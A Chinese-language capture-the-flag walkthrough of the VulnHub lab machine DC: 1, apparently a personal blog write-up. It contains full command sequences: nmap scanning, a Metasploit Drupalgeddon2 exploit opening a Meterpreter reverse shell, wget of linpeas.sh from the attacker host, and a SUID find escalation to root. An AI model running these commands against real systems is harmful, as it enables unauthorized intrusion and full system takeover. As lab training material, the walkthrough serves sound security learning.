DC 1
作者: jason_huawen
靶机基本信息
名称:DC: 1
地址:
https://www.vulnhub.com/entry/dc-1,292/
识别目标主机IP地址
┌──(kali㉿kali)-[~/Vulnhub/DC_1]
└─$ sudo netdiscover -i eth1
Currently scanning: 192.168.171.0/16 | Screen View: Unique Hosts
3 Captured ARP Req/Rep packets, from 3 hosts. Total size: 180
_____________________________________________________________________________
IP At MAC Address Count Len MAC Vendor / Hostname
-----------------------------------------------------------------------------
192.168.56.1 0a:00:27:00:00:0a 1 60 Unknown vendor
192.168.56.100 08:00:27:55:6f:ee 1 60 PCS Systemtechnik GmbH
192.168.56.252 08:00:27:86:65:45 1 60 PCS Systemtechnik GmbH
利用Kali Linux自带的netdiscover工具识别目标主机的IP地址为192.168.56.252
NMAP扫描
┌──(kali㉿kali)-[~/Vulnhub/DC_1]
└─$ sudo nmap -sS -sV -sC -p- 192.168.56.252 -oN nmap_full_scan
Starting Nmap 7.92 ( https://nmap.org ) at 2022-12-03 22:29 EST
Nmap scan report for localhost (192.168.56.252)
Host is up (0.00023s latency).
Not shown: 65531 closed tcp ports (reset)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 6.0p1 Debian 4+deb7u7 (protocol 2.0)
| ssh-hostkey:
| 1024 c4:d6:59:e6:77:4c:22:7a:96:16:60:67:8b:42:48:8f (DSA)
| 2048 11:82:fe:53:4e:dc:5b:32:7f:44:64:82:75:7d:d0:a0 (RSA)
|_ 256 3d:aa:98:5c:87:af:ea:84:b8:23:68:8d:b9:05:5f:d8 (ECDSA)
80/tcp open http Apache httpd 2.2.22 ((Debian))
| http-robots.txt: 36 disallowed entries (15 shown)
| /includes/ /misc/ /modules/ /profiles/ /scripts/
| /themes/ /CHANGELOG.txt /cron.php /INSTALL.mysql.txt
| /INSTALL.pgsql.txt /INSTALL.sqlite.txt /install.php /INSTALL.txt
|_/LICENSE.txt /MAINTAINERS.txt
|_http-title: Welcome to Drupal Site | Drupal Site
|_http-generator: Drupal 7 (http://drupal.org)
|_http-server-header: Apache/2.2.22 (Debian)
111/tcp open rpcbind 2-4 (RPC #100000)
| rpcinfo:
| program version port/proto service
| 100000 2,3,4 111/tcp rpcbind
| 100000 2,3,4 111/udp rpcbind
| 100000 3,4 111/tcp6 rpcbind
| 100000 3,4 111/udp6 rpcbind
| 100024 1 34380/udp6 status
| 100024 1 37326/tcp status
| 100024 1 44788/udp status
|_ 100024 1 59563/tcp6 status
37326/tcp open status 1 (RPC #100024)
MAC Address: 08:00:27:86:65:45 (Oracle VirtualBox virtual NIC)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 15.18 seconds
NMAP扫描结果表明目标主机有4个开放端口:22(SSH)、80(HTTP)、111(RPC)、37326(RPC)
获得Shell
访问80端口,发现目标主机运行drupal CMS,在metasploit查询一下是否可以有可利用的模块,依次尝试,在尝试第二个模块时,成功得到了目标的shell
msf6 exploit(unix/webapp/drupal_coder_exec) > search drupal
Matching Modules
================
# Name Disclosure Date Rank Check Description
- ---- --------------- ---- ----- -----------
0 exploit/unix/webapp/drupal_coder_exec 2016-07-13 excellent Yes Drupal CODER Module Remote Command Execution
1 exploit/unix/webapp/drupal_drupalgeddon2 2018-03-28 excellent Yes Drupal Drupalgeddon 2 Forms API Property Injection
2 exploit/multi/http/drupal_drupageddon 2014-10-15 excellent No Drupal HTTP Parameter Key/Value SQL Injection
3 auxiliary/gather/drupal_openid_xxe 2012-10-17 normal Yes Drupal OpenID External Entity Injection
4 exploit/unix/webapp/drupal_restws_exec 2016-07-13 excellent Yes Drupal RESTWS Module Remote PHP Code Execution
5 exploit/unix/webapp/drupal_restws_unserialize 2019-02-20 normal Yes Drupal RESTful Web Services unserialize() RCE
6 auxiliary/scanner/http/drupal_views_user_enum 2010-07-02 normal Yes Drupal Views Module Users Enumeration
7 exploit/unix/webapp/php_xmlrpc_eval 2005-06-29 excellent Yes PHP XML-RPC Arbitrary Code Execution
Interact with a module by name or index. For example info 7, use 7 or use exploit/unix/webapp/php_xmlrpc_eval
msf6 exploit(unix/webapp/drupal_coder_exec) > use exploit/unix/webapp/drupal_drupalgeddon2
[*] No payload configured, defaulting to php/meterpreter/reverse_tcp
msf6 exploit(unix/webapp/drupal_drupalgeddon2) > show options
Module options (exploit/unix/webapp/drupal_drupalgeddon2):
Name Current Setting Required Description
---- --------------- -------- -----------
DUMP_OUTPUT false no Dump payload command output
PHP_FUNC passthru yes PHP function to execute
Proxies no A proxy chain of format type:host:port[,type:host:port][...]
RHOSTS yes The target host(s), see https://github.com/rapid7/metasploit-framework/wiki/Usi
ng-Metasploit
RPORT 80 yes The target port (TCP)
SSL false no Negotiate SSL/TLS for outgoing connections
TARGETURI / yes Path to Drupal install
VHOST no HTTP server virtual host
Payload options (php/meterpreter/reverse_tcp):
Name Current Setting Required Description
---- --------------- -------- -----------
LHOST 10.0.2.15 yes The listen address (an interface may be specified)
LPORT 4444 yes The listen port
Exploit target:
Id Name
-- ----
0 Automatic (PHP In-Memory)
msf6 exploit(unix/webapp/drupal_drupalgeddon2) > set LHOST 192.168.56.206
LHOST => 192.168.56.206
msf6 exploit(unix/webapp/drupal_drupalgeddon2) > set LPORT 5555
LPORT => 5555
msf6 exploit(unix/webapp/drupal_drupalgeddon2) > set RHOSTS 192.168.56.252
RHOSTS => 192.168.56.252
msf6 exploit(unix/webapp/drupal_drupalgeddon2) > exploit
[*] Started reverse TCP handler on 192.168.56.206:5555
[*] Running automatic check ("set AutoCheck false" to disable)
[!] The service is running, but could not be validated.
[*] Sending stage (39927 bytes) to 192.168.56.252
[*] Meterpreter session 1 opened (192.168.56.206:5555 -> 192.168.56.252:48156) at 2022-12-03 22:45:18 -0500
id
meterpreter > id
[-] Unknown command: id
meterpreter > shell
Process 3126 created.
Channel 0 created.
id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
www-data@DC-1:/var/www$ cat flag1.txt
cat flag1.txt
Every good CMS needs a config file - and so do you.
www-data@DC-1:/var/www$
拿到了第1个flag。
www-data@DC-1:/home/flag4$ ls -alh
ls -alh
total 28K
drwxr-xr-x 2 flag4 flag4 4.0K Feb 19 2019 .
drwxr-xr-x 3 root root 4.0K Feb 19 2019 ..
-rw------- 1 flag4 flag4 28 Feb 19 2019 .bash_history
-rw-r--r-- 1 flag4 flag4 220 Feb 19 2019 .bash_logout
-rw-r--r-- 1 flag4 flag4 3.4K Feb 19 2019 .bashrc
-rw-r--r-- 1 flag4 flag4 675 Feb 19 2019 .profile
-rw-r--r-- 1 flag4 flag4 125 Feb 19 2019 flag4.txt
www-data@DC-1:/home/flag4$ cat flag4.txt
cat flag4.txt
Can you use this same method to find or access the flag in root?
Probably. But perhaps it's not that easy. Or maybe it is?
www-data@DC-1:/home/flag4$
拿到了第4个flag。
提权
将Linpeas.sh脚本上传至目标主机的/tmp目录下,修改权限,并执行脚本,输出结果中提示可以利用Find命令的SUID位进行提权:
www-data@DC-1:/home/flag4$ cd /tmp
cd /tmp
www-data@DC-1:/tmp$ wget http://192.168.56.206:8000/linpeas.sh
wget http://192.168.56.206:8000/linpeas.sh
--2022-12-04 13:50:12-- http://192.168.56.206:8000/linpeas.sh
Connecting to 192.168.56.206:8000... connected.
HTTP request sent, awaiting response... 200 OK
Length: 765823 (748K) [text/x-sh]
Saving to: `linpeas.sh'
100%[======================================>] 765,823 --.-K/s in 0.007s
2022-12-04 13:50:12 (111 MB/s) - `linpeas.sh' saved [765823/765823]
www-data@DC-1:/tmp$ chmod +x linpeas.sh
chmod +x linpeas.sh
www-data@DC-1:/tmp$ ./linpeas.sh
./linpeas.sh
▄▄▄▄▄▄▄▄▄▄▄▄▄▄
▄▄▄▄▄▄▄ ▄▄▄▄▄▄▄▄
▄▄▄▄▄▄▄ ▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄ ▄▄▄▄
▄▄▄▄ ▄ ▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄ ▄▄▄▄▄▄
▄ ▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄
▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄ ▄▄▄▄▄ ▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄
▄▄▄▄▄▄▄▄▄▄▄ ▄▄▄▄▄▄ ▄▄▄▄▄▄ ▄
▄▄▄▄▄▄ ▄▄▄▄▄▄▄▄ ▄▄▄▄
▄▄ ▄▄▄ ▄▄▄▄▄ ▄▄▄
▄▄ ▄▄▄▄▄▄▄▄▄▄▄▄ ▄▄
▄ ▄▄ ▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄ ▄▄
▄ ▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄
▄▄▄▄▄▄▄▄▄▄▄▄▄▄ ▄▄▄▄
▄▄▄▄▄ ▄▄▄▄▄ ▄▄▄▄▄▄ ▄▄▄▄
▄▄▄▄ ▄▄▄▄▄ ▄▄▄▄▄ ▄ ▄▄
▄▄▄▄▄ ▄▄▄▄▄ ▄▄▄▄▄▄▄ ▄▄▄▄▄ ▄▄▄▄▄
▄▄▄▄▄▄ ▄▄▄▄▄▄▄ ▄▄▄▄▄▄▄ ▄▄▄▄▄▄▄ ▄▄▄▄▄
▄▄▄▄▄▄▄▄▄▄▄▄▄▄ ▄ ▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄
▄▄▄▄▄▄▄▄▄▄▄▄▄ ▄▄▄▄▄▄▄▄▄▄▄▄▄▄
▄▄▄▄▄▄▄▄▄▄▄ ▄▄▄▄▄▄▄▄▄▄▄▄▄▄
▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄ ▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄
▀▀▄▄▄ ▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄ ▄▄▄▄▄▄▄▀▀▀▀▀▀
▀▀▀▄▄▄▄▄ ▄▄▄▄▄▄▄▄▄▄ ▄▄▄▄▄▄▀▀
▀▀▀▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▀▀▀
/---------------------------------------------------------------------------\
| Do you like PEASS? |
|---------------------------------------------------------------------------|
| Become a Patreon : https://www.patreon.com/peass |
| Follow on Twitter : @carlospolopm |
| Respect on HTB : SirBroccoli |
|---------------------------------------------------------------------------|
| Thank you! |
\---------------------------------------------------------------------------/
linpeas-ng by carlospolop
ADVISORY: This script should be used for authorized penetration testing and/or educational purposes only. Any misuse of this software will not be the responsibility of the author or of any other collaborator. Use it at your own computers and/or with the computer owner's permission.
Linux Privesc Checklist: https://book.hacktricks.xyz/linux-unix/linux-privilege-escalation-checklist
LEGEND:
RED/YELLOW: 95% a PE vector
RED: You should take a look to it
LightCyan: Users with console
Blue: Users without console & mounted devs
Green: Common things (users, groups, SUID/SGID, mounts, .sh scripts, cronjobs)
LightMagenta: Your username
Starting linpeas. Caching Writable Folders...
╔═══════════════════╗
═════════════════════════════════════════╣ Basic information ╠═════════════════════════════════════════
╚═══════════════════╝
OS: Linux version 3.2.0-6-486 ([email protected]) (gcc version 4.9.2 (Debian 4.9.2-10+deb7u1) ) #1 Debian 3.2.102-1
User & Groups: uid=33(www-data) gid=33(www-data) groups=33(www-data)
Hostname: DC-1
Writable folder: /run/shm
[+] /bin/ping is available for network discovery (linpeas can discover hosts, learn more with -h)
[+] /bin/nc is available for network discover & port scanning (linpeas can discover hosts and scan ports, learn more with -h)
═════════════════════════════════════════╣ Interesting Files ╠═════════════════════════════════════════
╚═══════════════════╝
╔══════════╣ SUID - Check easy privesc, exploits and write perms
╚ https://book.hacktricks.xyz/linux-unix/privilege-escalation#sudo-and-suid
strace Not Found
-rwsr-xr-x 1 root root 87K Dec 10 2012 /bin/mount ---> Apple_Mac_OSX(Lion)_Kernel_xnu-1699.32.7_except_xnu-1699.24.8
-rwsr-xr-x 1 root root 31K Apr 13 2011 /bin/ping
-rwsr-xr-x 1 root root 35K Feb 27 2017 /bin/su
-rwsr-xr-x 1 root root 35K Apr 13 2011 /bin/ping6
-rwsr-xr-x 1 root root 67K Dec 10 2012 /bin/umount ---> BSD/Linux(08-1996)
-rwsr-sr-x 1 daemon daemon 50K Oct 4 2014 /usr/bin/at ---> RTru64_UNIX_4.0g(CVE-2002-1614)
-rwsr-xr-x 1 root root 36K Feb 27 2017 /usr/bin/chsh
-rwsr-xr-x 1 root root 45K Feb 27 2017 /usr/bin/passwd ---> Apple_Mac_OSX(03-2006)/Solaris_8/9(12-2004)/SPARC_8/9/Sun_Solaris_2.3_to_2.5.1(02-1997)
-rwsr-xr-x 1 root root 31K Feb 27 2017 /usr/bin/newgrp ---> HP-UX_10.20
-rwsr-xr-x 1 root root 44K Feb 27 2017 /usr/bin/chfn ---> SuSE_9.3/10
-rwsr-xr-x 1 root root 65K Feb 27 2017 /usr/bin/gpasswd
-rwsr-sr-x 1 root mail 82K Nov 18 2017 /usr/bin/procmail
-rwsr-xr-x 1 root root 159K Jan 6 2012 /usr/bin/find
-rwsr-xr-x 1 root root 916K Feb 11 2018 /usr/sbin/exim4
-rwsr-xr-x 1 root root 9.5K Jun 20 2017 /usr/lib/pt_chown ---> GNU_glibc_2.1/2.1.1_-6(08-1999)
-rwsr-xr-x 1 root root 243K Jan 27 2018 /usr/lib/openssh/ssh-keysign
-rwsr-xr-x 1 root root 5.3K Mar 28 2017 /usr/lib/eject/dmcrypt-get-device
-rwsr-xr-- 1 root messagebus 315K Feb 10 2015 /usr/lib/dbus-1.0/dbus-daemon-launch-helper
-rwsr-xr-x 1 root root 83K May 22 2013 /sbin/mount.nfs
╔══════════╣ SGID
╚ https://book.hacktricks.xyz/linux-unix/privilege-escalation#sudo-and-suid
-rwxr-sr-x 1 root ssh 126K Jan 27 2018 /usr/bin/ssh-agent
-rwsr-sr-x 1 daemon daemon 50K Oct 4 2014 /usr/bin/at ---> RTru64_UNIX_4.0g(CVE-2002-1614)
-rwxr-sr-x 1 root mlocate 30K Sep 25 2010 /usr/bin/mlocate
-rwxr-sr-x 1 root mail 18K Nov 18 2017 /usr/bin/lockfile
-rwxr-sr-x 1 root shadow 49K Feb 27 2017 /usr/bin/chage
-rwxr-sr-x 1 root tty 9.5K Jun 11 2012 /usr/bin/bsd-write
-rwxr-sr-x 1 root mail 9.6K Nov 30 2014 /usr/bin/mutt_dotlock
-rwxr-sr-x 1 root tty 18K Dec 10 2012 /usr/bin/wall
-rwxr-sr-x 1 root crontab 34K Jul 4 2012 /usr/bin/crontab
-rwxr-sr-x 1 root shadow 18K Feb 27 2017 /usr/bin/expiry
-rwsr-sr-x 1 root mail 82K Nov 18 2017 /usr/bin/procmail
-rwxr-sr-x 1 root mail 14K Dec 12 2012 /usr/bin/dotlockfile
-rwxr-sr-x 1 root utmp 4.9K Feb 21 2011 /usr/lib/utempter/utempter
-rwxr-sr-x 1 root shadow 30K May 5 2012 /sbin/unix_chkpwd
查询GTFOBINS网站所给出的方法进行提权:
www-data@DC-1:/tmp$ /usr/bin/find . -exec /bin/sh -p \; -quit
/usr/bin/find . -exec /bin/sh -p \; -quit
/bin/sh: 0: Illegal option -p
/bin/sh: 0: Illegal option -p
/bin/sh: 0: Illegal option -p
/bin/sh: 0: Illegal option -p
www-data@DC-1:/tmp$ ls -alh /usr/bin/find
ls -alh /usr/bin/find
-rwsr-xr-x 1 root root 159K Jan 6 2012 /usr/bin/find
但是执行失败,其实将sh修改为bash即可
www-data@DC-1:/tmp$ find . -exec /bin/bash -p \; -quit
find . -exec /bin/bash -p \; -quit
bash-4.2# cd /root
cd /root
bash-4.2# ls -alh
ls -alh
total 32K
drwx------ 4 root root 4.0K Feb 28 2019 .
drwxr-xr-x 23 root root 4.0K Feb 19 2019 ..
drwx------ 2 root root 4.0K Feb 19 2019 .aptitude
-rw------- 1 root root 44 Feb 28 2019 .bash_history
-rw-r--r-- 1 root root 949 Feb 19 2019 .bashrc
drwxr-xr-x 3 root root 4.0K Feb 19 2019 .drush
-rw-r--r-- 1 root root 140 Nov 20 2007 .profile
-rw-r--r-- 1 root root 173 Feb 19 2019 thefinalflag.txt
bash-4.2# cat thefinalflag.txt
cat thefinalflag.txt
Well done!!!!
Hopefully you've enjoyed this and learned some new skills.
You can let me know what you thought of this little journey
by contacting me via Twitter - @DCAU7
bash-4.2#
经验教训
- GTFOBINS网站给出的方法并不完全照搬,可能需要根据具体情况进行尝试。